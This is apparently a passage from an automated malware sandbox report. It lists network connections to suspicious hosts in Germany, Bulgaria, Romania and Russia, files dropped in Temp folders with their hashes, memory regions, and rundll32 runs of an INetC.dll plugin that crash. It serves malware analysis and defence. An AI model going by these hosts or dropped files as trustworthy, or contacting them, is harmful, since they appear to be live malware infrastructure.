| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.15.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.41.65.18.in-addr.arpa | udp |
| NL | 108.156.61.113:443 | dsepc5ud74wta.cloudfront.net | tcp |
| NL | 108.156.61.113:443 | dsepc5ud74wta.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| US | 8.8.8.8:53 | 59.128.172.185.in-addr.arpa | udp |
| DE | 185.172.128.90:80 | 185.172.128.90 | tcp |
| NL | 108.156.61.113:443 | dsepc5ud74wta.cloudfront.net | tcp |
| US | 8.8.8.8:53 | 240216234727901.mjj.xne26.cfd | udp |
| DE | 185.172.128.228:80 | 185.172.128.228 | tcp |
| DE | 185.172.128.59:80 | 185.172.128.59 | tcp |
| US | 8.8.8.8:53 | 90.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.128.172.185.in-addr.arpa | udp |
| BG | 94.156.35.76:80 | 240216234727901.mjj.xne26.cfd | tcp |
| US | 8.8.8.8:53 | 76.35.156.94.in-addr.arpa | udp |
| RO | 176.97.76.106:80 | | tcp |
| GB | 37.221.125.202:443 | | tcp |
| RU | 45.130.41.108:443 | | tcp |
| DE | 185.172.128.228:80 | | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\nsl222A.tmp\INetC.dll
| MD5 | 40d7eca32b2f4d29db98715dd45bfac5 |
| SHA1 | 124df3f617f562e46095776454e1c0c7bb791cc7 |
| SHA256 | 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9 |
| SHA512 | 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d |
C:\Users\Admin\AppData\Local\Temp\nsl222A.tmp\load.bat
| MD5 | c03b3682569c40524152ba0ea7bc25ff |
| SHA1 | 670c137c03ade8b573e4084c12dcb1d00e377c20 |
| SHA256 | 70e43edb60c75270e41a167cfc5e6c1b60a0d022b57812560006626c3904353f |
| SHA512 | 9b0f33cf044beb3a9f558e8a09f99b263c2b617169fa036876043b5e85a92eb5f0a2ed31accad878486dfdaa144f8b780ea14378ac2e0d3b273cf6100515019a |
memory/2636-16-0x00000000733A0000-0x0000000073B50000-memory.dmp
memory/2636-18-0x0000000002F30000-0x0000000002F66000-memory.dmp
memory/2636-17-0x0000000002FA0000-0x0000000002FB0000-memory.dmp
memory/2636-19-0x0000000005620000-0x0000000005C48000-memory.dmp
memory/2636-20-0x0000000005D90000-0x0000000005DB2000-memory.dmp
memory/2636-22-0x0000000005EA0000-0x0000000005F06000-memory.dmp
memory/2636-21-0x0000000005E30000-0x0000000005E96000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e2akcz2x.4rf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2636-32-0x0000000005F10000-0x0000000006264000-memory.dmp
memory/2636-33-0x00000000052B0000-0x00000000052CE000-memory.dmp
memory/2636-34-0x00000000065E0000-0x000000000662C000-memory.dmp
memory/2636-35-0x0000000007DC0000-0x000000000843A000-memory.dmp
memory/2636-36-0x0000000006A20000-0x0000000006A3A000-memory.dmp
memory/2636-39-0x00000000733A0000-0x0000000073B50000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 4280e36a29fa31c01e4d8b2ba726a0d8 |
| SHA1 | c485c2c9ce0a99747b18d899b71dfa9a64dabe32 |
| SHA256 | e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359 |
| SHA512 | 494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4 |
memory/1128-41-0x00000000733A0000-0x0000000073B50000-memory.dmp
memory/1128-43-0x00000000049F0000-0x0000000004A00000-memory.dmp
memory/1128-42-0x00000000049F0000-0x0000000004A00000-memory.dmp
memory/1128-53-0x0000000005AE0000-0x0000000005E34000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d02e8dd7e953d11b224009703e99f028 |
| SHA1 | c99416dcb9cf7413ff8295b35ab5c5e18291470f |
| SHA256 | dedf997020412bc936aebd97770ffa81bac44cf868f34e9565527accc96d3c3f |
| SHA512 | f638d24b63919825cc60ab210a59e9ce170fa9b3a3765f2a05147c7b8da18de18e31bdfd7ff1e81b176a3dd33433d63fd3ad5bca2b24dcb4f33541c80801ab32 |
memory/1128-57-0x00000000733A0000-0x0000000073B50000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\i1.exe
| MD5 | ae73eb4cbe39e4a9e28a367331329a12 |
| SHA1 | fa827d6b4f9c94dd137fc24b201259a4c8293913 |
| SHA256 | 5f302f2c568cfc3bef4f7690b84d15dd58caace21a60f76d807e909ff8f81e5e |
| SHA512 | b8b28158002cdd797cfe9050d93ba7d3122ac9a6e308d60c13027546bcfde0fa17df38e980016c6bb91fec62b2b6a9acfc55b58a5983e2beab248aac469a9500 |
memory/4928-64-0x0000000004390000-0x0000000004490000-memory.dmp
memory/4612-66-0x0000000002AD0000-0x0000000002AE0000-memory.dmp
memory/4928-65-0x00000000042C0000-0x000000000432D000-memory.dmp
memory/4612-63-0x0000000002AD0000-0x0000000002AE0000-memory.dmp
memory/4612-72-0x0000000005A70000-0x0000000005DC4000-memory.dmp
memory/4612-62-0x00000000733A0000-0x0000000073B50000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4c6f54730910d3e4dadea44f592baca9 |
| SHA1 | 06abca310c557ed93283b0280aff1357ca12be59 |
| SHA256 | f278d704d280df3b03352a32064577f35c6cae593f0216374739ceeb15030b1a |
| SHA512 | 9e4077f3f1935892b72cb346d1667c737372379b893d1fbdcdb768280d03ac856e33869a2021f85ea6f496e2b43af5eef2a20ebc8dbd02efafad95c2c881a7e4 |
memory/4612-78-0x0000000006180000-0x00000000061CC000-memory.dmp
memory/4612-79-0x0000000002AD0000-0x0000000002AE0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u3sw.0.exe
| MD5 | 80e0fece33768e20034d106db0d36341 |
| SHA1 | ba12ccea1e640cdb5fedb0e9ac03aad09bdc9510 |
| SHA256 | 8a6721d38d828ce4dbbef786174faf854f366b0bf6f07189033aafa53459a14e |
| SHA512 | 1292b73f6e0673a118ad726ab14dbcbbbe9d1245cac978e5752838b51cccabd4a286397faf7de27b98cd9ab88ea04fb46aa02ec3287d641b3056593f69606e7f |
memory/4612-86-0x00000000733A0000-0x0000000073B50000-memory.dmp
memory/4224-92-0x00000000040C0000-0x00000000040E7000-memory.dmp
memory/4224-91-0x0000000004150000-0x0000000004250000-memory.dmp
memory/4224-93-0x0000000000400000-0x000000000403C000-memory.dmp
memory/4928-94-0x0000000000400000-0x000000000405F000-memory.dmp
memory/1428-95-0x00000000726A0000-0x0000000072E50000-memory.dmp
memory/1428-105-0x0000000006250000-0x00000000065A4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | be1f3feae3671325d6c9b24a5e9c60d0 |
| SHA1 | 025b9f60d608f51ad9a18fc09ed65329f262d10c |
| SHA256 | bb05790c1922675b5060f2fd7c50c9a097eab745213d696f79e7c2c90ebe3cc5 |
| SHA512 | ab86a04e047e382bce0213281f6f3875e58b8d635fc70d92274acdf71b6074c6fe8efd48b6c058bbd023ada0a53f0acdc86baf50d9900ce080f3decccdbc370b |
memory/1428-107-0x00000000068E0000-0x000000000692C000-memory.dmp
memory/4928-108-0x0000000004390000-0x0000000004490000-memory.dmp
memory/1428-112-0x00000000726A0000-0x0000000072E50000-memory.dmp
memory/1428-113-0x00000000055E0000-0x00000000055F0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u3sw.1.zip
| MD5 | 39c5d2cf57a3b2a153f843ec9c488586 |
| SHA1 | 72d410f9a382781c257c255852a6c520f11acfec |
| SHA256 | 6da1d403f7bef8f14c80a4747ae66e0ad90a74dce18ae5e8913baddb1b6a8de6 |
| SHA512 | 95d54e601da6184f2251375f5eac9f8d5fc810ea48fbf6b6220811cfee4548e38d29cabea4c9b963968a23a6c672a2576f5d229a5c7865107065b82fbf71f3d1 |
C:\Users\Admin\AppData\Local\Temp\u3sw.2\run.exe
| MD5 | 9fb4770ced09aae3b437c1c6eb6d7334 |
| SHA1 | fe54b31b0db8665aa5b22bed147e8295afc88a03 |
| SHA256 | a05b592a971fe5011554013bcfe9a4aaf9cfc633bdd1fe3a8197f213d557b8d3 |
| SHA512 | 140fee6daf23fe8b7e441b3b4de83554af804f00ecedc421907a385ac79a63164bd9f28b4be061c2ea2262755d85e14d3a8e7dc910547837b664d78d93667256 |
C:\Users\Admin\AppData\Local\Temp\u3sw.2\relay.dll
| MD5 | 10d51becd0bbce0fab147ff9658c565e |
| SHA1 | 4689a18112ff876d3c066bc8c14a08fd6b7b7a4a |
| SHA256 | 7b2db9c88f60ed6dd24b1dec321a304564780fdb191a96ec35c051856128f1ed |
| SHA512 | 29faf493bb28f7842c905adc5312f31741effb09f841059b53d73b22aea2c4d41d73db10bbf37703d6aeb936ffacbc756a3cc85ba3c0b6a6863ef4d27fefcd29 |
C:\Users\Admin\AppData\Local\Temp\u3sw.2\whale.dbf
| MD5 | a723bf46048e0bfb15b8d77d7a648c3e |
| SHA1 | 8952d3c34e9341e4425571e10f22b782695bb915 |
| SHA256 | b440170853bdb43b66497f701aee2901080326975140b095a1669cb9dee13422 |
| SHA512 | ca8ea2f7f3c7af21b5673a0a3f2611b6580a7ed02efa2cfd8b343eb644ff09682bde43b25ef7aab68530d5ce31dcbd252c382dd336ecb610d4c4ebde78347273 |
C:\Users\Admin\AppData\Local\Temp\u3sw.2\bunch.dat
| MD5 | 1e8237d3028ab52821d69099e0954f97 |
| SHA1 | 30a6ae353adda0c471c6ed5b7a2458b07185abf2 |
| SHA256 | 9387488f9d338e211be2cb45109bf590a5070180bc0d4a703f70d3cb3c4e1742 |
| SHA512 | a6406d7c18694ee014d59df581f1f76e980b68e3361ae680dc979606a423eba48d35e37f143154dd97fe5f066baf0ea51a2e9f8bc822d593e1cba70ead6559f3 |
memory/1260-200-0x000000006F9B0000-0x000000006FB2B000-memory.dmp
memory/1260-202-0x00007FFFF6CB0000-0x00007FFFF6EA5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u3sw.2\UIxMarketPlugin.dll
| MD5 | d1ba9412e78bfc98074c5d724a1a87d6 |
| SHA1 | 0572f98d78fb0b366b5a086c2a74cc68b771d368 |
| SHA256 | cbcea8f28d8916219d1e8b0a8ca2db17e338eb812431bc4ad0cb36c06fd67f15 |
| SHA512 | 8765de36d3824b12c0a4478c31b985878d4811bd0e5b6fba4ea07f8c76340bd66a2da3490d4871b95d9a12f96efc25507dfd87f431de211664dbe9a9c914af6f |
memory/4928-201-0x0000000000400000-0x000000000405F000-memory.dmp
memory/1260-208-0x000000006F9B0000-0x000000006FB2B000-memory.dmp
memory/1260-209-0x000000006F9B0000-0x000000006FB2B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\5bc8dff9
| MD5 | 912bcdd3a6198009d2b54fc4990f1a28 |
| SHA1 | 85226d65baeda202869e1806c6dd8ada7a617944 |
| SHA256 | 7e6cdd2634516c63ebafbd35d224cb335a374813c14f743ca4eb3856b1213d24 |
| SHA512 | 582878d5c4c3844a15a03936bed8bb871c3b0699fb519262867fb02c03b71baac7d63e4c63374e3178c1ae1f1ce65db4995fc946af72f515e328824cf2602751 |
memory/4100-211-0x000000006F9B0000-0x000000006FB2B000-memory.dmp
memory/4100-214-0x00007FFFF6CB0000-0x00007FFFF6EA5000-memory.dmp
memory/4100-219-0x000000006F9B0000-0x000000006FB2B000-memory.dmp
memory/4100-218-0x000000006F9B0000-0x000000006FB2B000-memory.dmp
memory/4100-221-0x000000006F9B0000-0x000000006FB2B000-memory.dmp
memory/1808-222-0x000000006D030000-0x000000006E284000-memory.dmp
memory/1808-226-0x0000000000FC0000-0x0000000001086000-memory.dmp
memory/1808-227-0x0000000005510000-0x00000000055A2000-memory.dmp
memory/1808-228-0x00000000726A0000-0x0000000072E50000-memory.dmp
memory/1808-229-0x0000000005BD0000-0x0000000006174000-memory.dmp
memory/1808-230-0x0000000005700000-0x0000000005710000-memory.dmp
memory/1808-231-0x00000000058E0000-0x0000000005AA2000-memory.dmp
memory/1808-232-0x0000000005710000-0x0000000005786000-memory.dmp
memory/1808-233-0x0000000005650000-0x00000000056A0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\u3sw.3.exe
| MD5 | c81c2c220e6dc8e68be98dd253160972 |
| SHA1 | 35ca97a4a4ba8ab2c7d959a8ec4d3a3eb7a53550 |
| SHA256 | 5c6f78bd2c94c3e2ae60943af869146fe9b78c8a3ebbd2fc98814cde791b8d79 |
| SHA512 | 18a37f715169ebb2905c24ad827a70cee1f21fd449431b3dfa6318fef61319a7a6fee5a2a8fd0920d381f577e7a0f95d4636806711369dcedc3d8a39c7659fda |
C:\Users\Admin\AppData\Local\Temp\u3sw.3.exe
| MD5 | b050af9d04a9e7b827bb94424578d303 |
| SHA1 | 8d42eb0bfe768d5ad14e4029b93148205e1a4338 |
| SHA256 | a971c66b87bd002ad6dd97e59ff2b2b03a6e0332f3f5e66f6a1754a566f79acc |
| SHA512 | e6e0227d380016776c0fb8ed75d11c17c8a271f4bea401a5e82bbaba21d4d7ae306a5f1f22cd116d5704ecb716a872dd179f831d27b21e2e1bb6d22fa497f54d |
C:\Users\Admin\AppData\Local\Temp\u3sw.3.exe
| MD5 | bc0d1292d9bc0f1bb471721695c178c2 |
| SHA1 | 039a7679de9769b4656a202cad86b3e172540914 |
| SHA256 | 2be1c6eee936e18047a5cf2a4103299811a2dfa96ba2ffe06e930c50a53432c3 |
| SHA512 | af97f80ea0dd12c142eb2efe34d8988066121f6bc2630f888c93b50324cc7e1f931628df7931479013302bb56a49351b3f4a53aecb34753c2220f9fabcd44fac |
memory/1880-245-0x00000000026B0000-0x00000000026B1000-memory.dmp
memory/4928-250-0x0000000000400000-0x000000000405F000-memory.dmp
memory/1880-270-0x0000000000400000-0x00000000008AD000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt
| MD5 | f080db1e41b1e7cd633873f8d40d2806 |
| SHA1 | caa0c2d7078f46f3b50f0b265d1b601b26b2b15f |
| SHA256 | d00965c1b4aa775e3207a4fcc3638ad21281591f1fdd22234d493be61a8c7813 |
| SHA512 | 2495d7a514c169195d101d771380ad9ae45a295517c60794d09e865f1a60268b511c5650515936f5e39f67242c8ca2b07f0554a90e12d2c5b807c55c02bb6978 |
memory/1880-281-0x0000000000400000-0x00000000008AD000-memory.dmp
memory/1428-283-0x00000000726A0000-0x0000000072E50000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\i3.exe
| MD5 | 6e5f4e31f072c2aa370f2b8ff602dc2e |
| SHA1 | 29343585a35b3939dcc6fdc6e9bb6cbd56d1dcaf |
| SHA256 | b994abb2f06a392424f4c9125c0753ea3ad3bcd9999dcf8b22315fd947ad5ea3 |
| SHA512 | 5b5d87306e17b9db3eece2cd56a3c84943faf6c0b65e8348f931252686583656153bb6896951878799baa0d324b66ecbfe7caf1ad484f07e489c937df9882ce0 |
C:\Users\Admin\AppData\Local\Temp\i3.exe
| MD5 | 97d96283e1856814e59b8ec8287a445d |
| SHA1 | 889e6f6c65e5b89dde48c883250ab0b9cfffb779 |
| SHA256 | 47de29e2a2222ce812d756b3d5dbbbf22eb55aed4ab8604a8b9e4572922d8b50 |
| SHA512 | 678d21219343f86ca92d75702432d98e63fa0f361a2c284793972ff838e462a89120a07b4cd07cc5725d27dd8a1579a9bb02bfd48bb7fd5e9f8de3831e4bd150 |
memory/1880-299-0x0000000000400000-0x00000000008AD000-memory.dmp
memory/1808-300-0x00000000726A0000-0x0000000072E50000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS350B.tmp\Install.exe
| MD5 | 66d7bd46038cf308a2ecd963a9af036a |
| SHA1 | eb02509dc5588b65cd3bb214220e989d26b9f07e |
| SHA256 | 303b0db6efb6e4cf81ce0c6029d85c56620d2ee042c03b3f6be23f8dcdcb4c41 |
| SHA512 | 97ecfce643b5709aca728db26d0dfabac6ca83d6df19b0b3245ca50658f54859c94cd80122b248b76433e9fb2d6d9e98d3d760dd537d61f97afa989d64d6725b |
memory/1808-303-0x0000000005700000-0x0000000005710000-memory.dmp
memory/4092-304-0x00000000005A0000-0x0000000000C14000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-04-26 09:05
Reported
2024-04-26 09:08
Platform
win7-20240221-en
Max time kernel
120s
Max time network
124s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 240
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-04-26 09:05
Reported
2024-04-26 09:08
Platform
win10v2004-20240412-en
Max time kernel
140s
Max time network
149s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5088 wrote to memory of 3436 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 5088 wrote to memory of 3436 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 5088 wrote to memory of 3436 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\INetC.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 3436 -ip 3436
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3436 -s 632
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.32.209.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.169.31.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |